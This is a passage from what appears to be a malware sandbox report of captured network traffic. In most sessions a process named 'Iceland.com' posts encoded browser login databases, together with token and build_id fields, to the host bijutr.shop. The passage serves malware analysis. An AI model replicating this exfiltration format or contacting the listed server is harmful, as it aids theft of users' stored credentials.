27	192.168.2.5	49984	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:43 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GVS0HVS2V3W4E3EUK6P8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 68733 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:43 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 56 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 47 56 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 47 56 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 0d 0a 43 6f 6e 74 Data Ascii: ------GVS0HVS2V3W4E3EUK6P8Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------GVS0HVS2V3W4E3EUK6P8Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------GVS0HVS2V3W4E3EUK6P8Cont
2024-12-27 06:10:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:43 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
2024-12-27 06:10:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:43 UTC	3313	OUT	Data Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31 Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
2024-12-27 06:10:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:10:45 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49994	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:45 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BA1VAI58YMYU379R1D26 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 262605 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:45 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 32 36 0d 0a 43 6f 6e 74 Data Ascii: ------BA1VAI58YMYU379R1D26Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------BA1VAI58YMYU379R1D26Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------BA1VAI58YMYU379R1D26Cont
2024-12-27 06:10:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:45 UTC	16355	OUT	Data Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
2024-12-27 06:10:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49966	18.165.220.106	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:46 UTC	925	OUT	GET /b?rn=1735279845647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2553C31DEE6B611F1DE5D67FEF6C6080&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-27 06:10:47 UTC	955	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Fri, 27 Dec 2024 06:10:47 GMT Accept-CH: UA, Platform, Arch, Model, Mobile Location: /b2?rn=1735279845647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2553C31DEE6B611F1DE5D67FEF6C6080&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=15166cfb5c5b57cbb43e95c1735279847; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=15166cfb5c5b57cbb43e95c1735279847; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 X-Cache: Miss from cloudfront Via: 1.1 d46e622c0d11ffdbb1b481b1a8f2ae72.cloudfront.net (CloudFront) X-Amz-Cf-Pop: BAH53-P1 X-Amz-Cf-Id: Rd99t9J8vWz1cRY945Rm_oBiyd3mEyyWM_r_UyG04YHN4TSXeG1iZg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50012	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:47 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ASRIWLNYCBIEUAAI5F37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
